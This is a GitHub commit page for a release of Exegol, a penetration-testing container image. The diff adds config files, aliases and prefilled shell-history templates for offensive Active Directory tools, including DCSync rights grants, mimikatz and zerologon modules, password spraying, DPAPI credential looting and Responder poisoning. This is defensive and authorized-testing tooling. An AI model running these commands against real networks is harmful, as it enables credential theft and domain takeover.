Skip to content

Commit

Permalink
Merge pull request #331 from ThePorgs/dev
Browse files Browse the repository at this point in the history 
Release 3.1.3
  • Loading branch information
@ShutdownRepo
ShutdownRepo authored Apr 14, 2024
2 parents ef1bc9c + 9060fa5 commit a7c25d3
Show file tree
Hide file tree
Showing 59 changed files with 767 additions and 343 deletions.
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_ad.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
Expand Down
4 changes: 2 additions & 2 deletions .github/workflows/entrypoint_preprod_base.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -35,7 +35,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
with:
fetch-depth: 2
- name: Setting variables
Expand Down Expand Up @@ -207,7 +207,7 @@ jobs:
GITHUB_TOKEN: ${{ secrets.GH_PAT_BASE_TRIGGER }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: List labels
run: gh pr view --json labels ${{ github.event.number }} -q '.labels[].name'
- name: Label "base success" already set?
Expand Down
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_full.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
Expand Down
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_light.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
Expand Down
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_osint.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
Expand Down
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_web.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
Expand Down
4 changes: 2 additions & 2 deletions .github/workflows/sub_build.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -42,14 +42,14 @@ jobs:
docker image ls -a
docker ps
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Prepare build
# Preparing variables used for tagging the image to build
id: prepare
run: echo "BUILD_DATE=$(date -u +"%Y-%m-%dT%H:%M:%SZ")" >> $GITHUB_OUTPUT
- name: Build the image
if: success()
uses: docker/build-push-action@v4
uses: docker/build-push-action@master
with:
load: true
no-cache: true
Expand Down
4 changes: 2 additions & 2 deletions .github/workflows/sub_code_check.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,14 +12,14 @@ jobs:
checked_function: [ "colorecho", "add-aliases", "add-history", "add-test-command", "add-to-list" ]
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Check ${{ matrix.checked_function }}
run: python3 sources/code_compliance_check.py ${{ matrix.checked_function }}
shellcheck:
name: Shell check
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: actions/checkout@main
- name: Run ShellCheck
uses: ludeeus/action-shellcheck@master
env:
Expand Down
4 changes: 2 additions & 2 deletions .github/workflows/sub_export_tools.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -35,9 +35,9 @@ jobs:
- ${{ inputs.ARCH }}
steps:
- name: Checkout Exegol-images
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Checkout Exegol-docs
uses: actions/checkout@v3
uses: actions/checkout@main
with:
repository: 'ThePorgs/Exegol-docs'
ref: ${{ inputs.DOCS_TARGET_BRANCH }}
Expand Down
23 changes: 23 additions & 0 deletions sources/assets/bloodhound-ce/bloodhound.config.json
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
{
"version": 1,
"bind_addr": "localhost:1030",
"metrics_port": ":2112",
"root_url": "http://localhost:1030/",
"work_dir": "/opt/tools/BloodHound-CE/work",
"log_level": "INFO",
"log_path": "bloodhound.log",
"features": {
"enable_auth": true
},
"tls": {
"cert_file": "",
"key_file": ""
},
"database": {
"connection": "user=bloodhound password=exegol4thewin dbname=bloodhound host=localhost"
},
"neo4j": {
"connection": "neo4j://neo4j:exegol4thewin@localhost:7687/"
},
"collectors_base_path": "/opt/tools/BloodHound-CE/collectors"
}
267 changes: 158 additions & 109 deletions sources/assets/bloodhound/customqueries.json
View file

Large diffs are not rendered by default.

9 changes: 7 additions & 2 deletions sources/assets/exegol/load_supported_setups.sh
View file
Original file line number Diff line number Diff line change
Expand Up @@ -62,8 +62,13 @@ function deploy_zsh() {
function deploy_tmux() {
colorecho "Deploying tmux"
if [[ -d "$MY_SETUP_PATH/tmux" ]]; then
# copy tmux/tmux.conf to ~/.tmux.conf
[[ -f "$MY_SETUP_PATH/tmux/tmux.conf" ]] && cp "$MY_SETUP_PATH/tmux/tmux.conf" ~/.tmux.conf
# id define, copy tmux/tmux.conf to ~/.tmux.conf
if [[ -f "$MY_SETUP_PATH/tmux/tmux.conf" ]]; then
# This key must always be defined (if redefined later in the file, the user user will take precedence)
echo 'set-option -g default-shell /bin/zsh' > ~/.tmux.conf
# Adding custom user config
cat "$MY_SETUP_PATH/tmux/tmux.conf" >> ~/.tmux.conf
fi
else
mkdir "$MY_SETUP_PATH/tmux" && chmod 770 "$MY_SETUP_PATH/tmux"
fi
Expand Down
12 changes: 12 additions & 0 deletions sources/assets/patches/openssl.patch
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
[exegol_provider]
default = default_sect
legacy = legacy_sect

[openssl_init]
providers = exegol_provider

[default_sect]
activate = 1

[legacy_sect]
activate = 1
36 changes: 36 additions & 0 deletions sources/assets/python/requirements.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
# most common dependencies, found with the following commands
# 1. for pipx:
# find ~/.local/share/pipx/ -type d -name "bin" 2>/dev/null | while read venv_path; do venv_bin="${venv_path}/python"; if [[ -x "$venv_bin" ]]; then suffix=$(printf "%04d" $((suffix+1))); "$venv_bin" -m pip list > "/tmp/pipxlibs${suffix}.txt"; fi; done
# 2. for /opt/tools:
# find /opt/tools ~/.local/share/pipx/ -type d -name "venv" 2>/dev/null | while read venv_path; do venv_bin="${venv_path}/bin/python"; if [[ -x "$venv_bin" ]]; then suffix=$(printf "%04d" $((suffix+1))); "$venv_bin" -m pip list > "/tmp/piplibs${suffix}.txt"; fi; done
# 3. compare
# awk 'FNR > 2 {print $1}' /tmp/piplibs*.txt /tmp/pipxlibs*.txt | sort | uniq -c | sort -nr

# The impacket package cannot be added here as it will conflict with install_impacket

setuptools
pip
charset-normalizer
six
certifi
idna
urllib3
requests
pycparser
cffi
click
cryptography
MarkupSafe
Jinja2
pyasn1
dnspython
Werkzeug
pyOpenSSL
itsdangerous
Flask
pycryptodomex
ldap3
blinker
future
ldapdomaindump
pandas
1 change: 1 addition & 0 deletions sources/assets/shells/aliases.d/_init
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,3 +8,4 @@ alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.
alias sed-empty-line='sed /^$/d'
alias http-put-server='python3 /opt/resources/linux/http-put-server.py --bind 0.0.0.0'
alias ws='cd /workspace'
alias systemctl="echo 'Systemctl cannot be used inside the container. Please use the \"service\" command instead.' && false"
2 changes: 1 addition & 1 deletion sources/assets/shells/aliases.d/burpsuite
View file
Original file line number Diff line number Diff line change
@@ -1,2 +1,2 @@
alias BurpSuiteCommunity='java -jar -Xmx4g /opt/tools/BurpSuiteCommunity/BurpSuiteCommunity.jar'
alias BurpSuiteCommunity='/usr/lib/jvm/java-21-openjdk/bin/java -jar -Xmx4g /opt/tools/BurpSuiteCommunity/BurpSuiteCommunity.jar'
alias burpsuite=BurpSuiteCommunity
2 changes: 1 addition & 1 deletion sources/assets/shells/aliases.d/evil-winrm
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
alias evil-winrm='/usr/local/rvm/gems/ruby-3.2.2@evil-winrm/wrappers/ruby /usr/local/rvm/gems/ruby-3.2.2@evil-winrm/bin/evil-winrm'
alias evil-winrm='/usr/local/rvm/gems/ruby-3.1.2@evil-winrm/wrappers/ruby /usr/local/rvm/gems/ruby-3.1.2@evil-winrm/bin/evil-winrm'
2 changes: 1 addition & 1 deletion sources/assets/shells/aliases.d/extractbitlockerkeys
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
alias ExtractBitlockerKeys.py="/opt/tools/ExtractBitlockerKeys/venv/bin/python3 /opt/tools/ExtractBitlockerKeys/ExtractBitlockerKeys.py"
alias ExtractBitlockerKeys.py="/opt/tools/ExtractBitlockerKeys/venv/bin/python3 /opt/tools/ExtractBitlockerKeys/python/ExtractBitlockerKeys.py"
5 changes: 4 additions & 1 deletion sources/assets/shells/aliases.d/metasploit
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,9 @@
alias msfconsole='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfconsole'
alias msfd='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfd'
alias msfdb='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfdb'
msfdb_func() {
sudo -u postgres sh -c "cd /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb $@"
}
alias msfdb='msfdb_func'
alias msfrpc='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfrpc'
alias msfrpcd='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfrpcd'
alias msfupdate='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfupdate'
Expand Down
1 change: 1 addition & 0 deletions sources/assets/shells/aliases.d/responder
View file
Original file line number Diff line number Diff line change
Expand Up @@ -5,3 +5,4 @@ alias responder-http-on="sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/
alias responder-http-off="sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='"
alias responder-smb-on="sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='"
alias responder-smb-off="sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='"
alias responder="Responder.py"
1 change: 1 addition & 0 deletions sources/assets/shells/aliases.d/sccmhunter
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
alias sccmhunter.py='/opt/tools/sccmhunter/venv/bin/python3 /opt/tools/sccmhunter/sccmhunter.py'
1 change: 1 addition & 0 deletions sources/assets/shells/aliases.d/sccmwtf
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
alias sccmwtf.py='/opt/tools/sccmwtf/venv/bin/python3 /opt/tools/sccmwtf/sccmwtf.py'
2 changes: 1 addition & 1 deletion sources/assets/shells/aliases.d/ysoserial
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
alias ysoserial='JAVA_HOME=/usr/lib/jvm/java-11-openjdk java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar /opt/tools/ysoserial/ysoserial.jar'
alias ysoserial='/usr/lib/jvm/java-11-openjdk/bin/java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar /opt/tools/ysoserial/ysoserial.jar'
2 changes: 1 addition & 1 deletion sources/assets/shells/history.d/abuseACL
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
abuseACL "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
abuseACL -hashes "$USER_NTHASH" -extends "$DOMAIN"/"$USER"
abuseACL -hashes "$NT_HASH" -extends "$DOMAIN"/"$USER"
abuseACL -k -principal "$PRINCIPAL" -extends "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
abuseACL -principalsfile ./principalsfile "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
16 changes: 16 additions & 0 deletions sources/assets/shells/history.d/bloodyAD
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME serviceprincipalname
bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME dnsHostName -v '$DC_NAME.$DOMAIN'
bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP get object $COMPUTER_NAME --attr dnsHostName,serviceprincipalname
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user msTSInitialProgram -v '\\1.2.3.4\share\file.exe'
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user msTSWorkDirectory -v 'C:\'
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user scriptPath -v '\\1.2.3.4\share\file.exe'
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set owner $TargetObject $ControlledPrincipal
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get dnsDump
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember $TargetGroup $TargetUser
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-NeverRevealGroup
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password $TargetUser $NewPassword
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add genericAll $TargetObject $ControlledPrincipal
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add dcsync $ControlledPrincipal
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object $TargetObject --attr msDS-ManagedPassword
2 changes: 1 addition & 1 deletion sources/assets/shells/history.d/certipy
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
certipy find -enabled -u "$USER@$DOMAIN" -p "$PASSWORD" -old-bloodhound
certipy req -username "$USER@$DOMAIN" -p "$PASSWORD" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
certipy req -username "$USER@$DOMAIN" -hashes "$USER_NTHASH" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
certipy req -username "$USER@$DOMAIN" -hashes "$NT_HASH" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
certipy relay -ca "$CA_FQDN" -template "$ESC8_TEMPLATE_NAME"
21 changes: 21 additions & 0 deletions sources/assets/shells/history.d/crackmapexec
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,24 @@
crackmapexec smb --list-modules
crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq
crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD"
crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST"
crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST"
crackmapexec smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
crackmapexec smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt
crackmapexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts
crackmapexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz
crackmapexec smb "$TARGET" -u '' -p '' --pass-pol
crackmapexec smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
crackmapexec smb 192.168.56.0/24 --local-auth -u '' -p ''
crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users
crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions
crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares
crackmapexec smb 192.168.56.0/24 -u '' -p '' --shares
crackmapexec smb "$IP" -u "$USER" -p "$PASSWORD" -M noPac
crackmapexec smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam
crackmapexec smb "$IP" -u '' -p '' -M zerologon
crackmapexec smb "$IP" -u '' -p '' -M ms17-010
crackmapexec smb "$IP" -u '' -p '' -M ioxidresolver
cme smb --list-modules
cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq
cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD"
Expand Down
24 changes: 24 additions & 0 deletions sources/assets/shells/history.d/dploot
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
dploot machinecertificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -quiet
dploot backupkey -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -quiet
dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk -quiet
dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile /data/masterkeys
dploot masterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
dploot masterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -passwords passwords
dploot credentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
dploot credentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
dploot vaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
dploot vaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
dploot rdg -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
dploot rdg -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
dploot machinemasterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
dploot machinecredentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
dploot machinevaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
dploot machinecertificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
dploot wifi -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
dploot sccm -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
dploot backupkey -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
dploot mobaxterm -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
8 changes: 5 additions & 3 deletions sources/assets/shells/history.d/kerbrute
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,5 @@
kerbrute userenum -d "$DOMAIN" usernames.txt
kerbrute passwordspray -d "$DOMAIN" domain_users.txt Password123
kerbrute bruteuser -d "$DOMAIN" passwords.lst thoffman
kerbrute userenum --domain "$DOMAIN" usernames.txt
kerbrute passwordspray --domain "$DOMAIN" domain_users.txt Password123
kerbrute passwordspray --user-as-pass --domain "$DOMAIN" domain_users.txt
kerbrute bruteuser --domain "$DOMAIN" passwords.lst thoffman
kerbrute bruteforce --domain "$DOMAIN" user_password.lst
22 changes: 22 additions & 0 deletions sources/assets/shells/history.d/netexec
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,3 +19,25 @@ netexec smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam
netexec smb "$IP" -u '' -p '' -M zerologon
netexec smb "$IP" -u '' -p '' -M ms17-010
netexec smb "$IP" -u '' -p '' -M ioxidresolver
netexec smb --list-modules
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD"
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST"
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST"
nxc smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
nxc smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt
nxc smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts
nxc smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz
nxc smb "$TARGET" -u '' -p '' --pass-pol
nxc smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
nxc smb 192.168.56.0/24 --local-auth -u '' -p ''
nxc smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users
nxc smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions
nxc smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares
nxc smb 192.168.56.0/24 -u '' -p '' --shares
nxc smb "$IP" -u "$USER" -p "$PASSWORD" -M noPac
nxc smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam
nxc smb "$IP" -u '' -p '' -M zerologon
nxc smb "$IP" -u '' -p '' -M ms17-010
nxc smb "$IP" -u '' -p '' -M ioxidresolver

5 changes: 5 additions & 0 deletions sources/assets/shells/history.d/pretender
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
pretender -i "$INTERFACE" --dry
pretender -i "$INTERFACE" --dry --no-ra
pretender -i "$INTERFACE" --dry --no-ra-dns
pretender -i "$INTERFACE" --spoof "$DOMAIN"

4 changes: 4 additions & 0 deletions sources/assets/shells/history.d/responder
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,10 @@ Responder.py --interface "$INTERFACE" --analyze --lm --disable-ess
Responder.py --interface "$INTERFACE" --analyze --disable-ess
Responder.py --interface "$INTERFACE" --wpad --lm --ProxyAuth --disable-ess
Responder.py --interface "$INTERFACE" --wpad --lm --disable-ess
responder --interface "$INTERFACE" --analyze --lm --disable-ess
responder --interface "$INTERFACE" --analyze --disable-ess
responder --interface "$INTERFACE" --wpad --lm --ProxyAuth --disable-ess
responder --interface "$INTERFACE" --wpad --lm --disable-ess
responder-http-off
responder-http-on
responder-smb-off
Expand Down
10 changes: 10 additions & 0 deletions sources/assets/shells/history.d/sccmhunter
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
sccmhunter.py admin -u "$USER" -p "$PASSWORD" -ip "$TARGET"
sccmhunter.py find -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP"
sccmhunter.py smb -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" -save
sccmhunter.py http -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" -auto
sccmhunter.py http -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -cn "$COMPUTER_NAME" -cp "$COMPUTER_PASSWORD" -dc-ip "$DC_IP"
sccmhunter.py admin -u "$USERNAME" -p ":$NT_HASH" -ip "$TARGET"
sccmhunter.py show -smb
sccmhunter.py show -user
sccmhunter.py show -computers
sccmhunter.py show -all
1 change: 1 addition & 0 deletions sources/assets/shells/history.d/sccmwtf
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
sccmwtf.py fakepc "fakepc.$DOMAIN" "$SCCM_MP_NetBiosName" "$DOMAIN\controlledComputer$" "controlledPassword"
Loading

0 comments on commit a7c25d3

Please sign in to comment.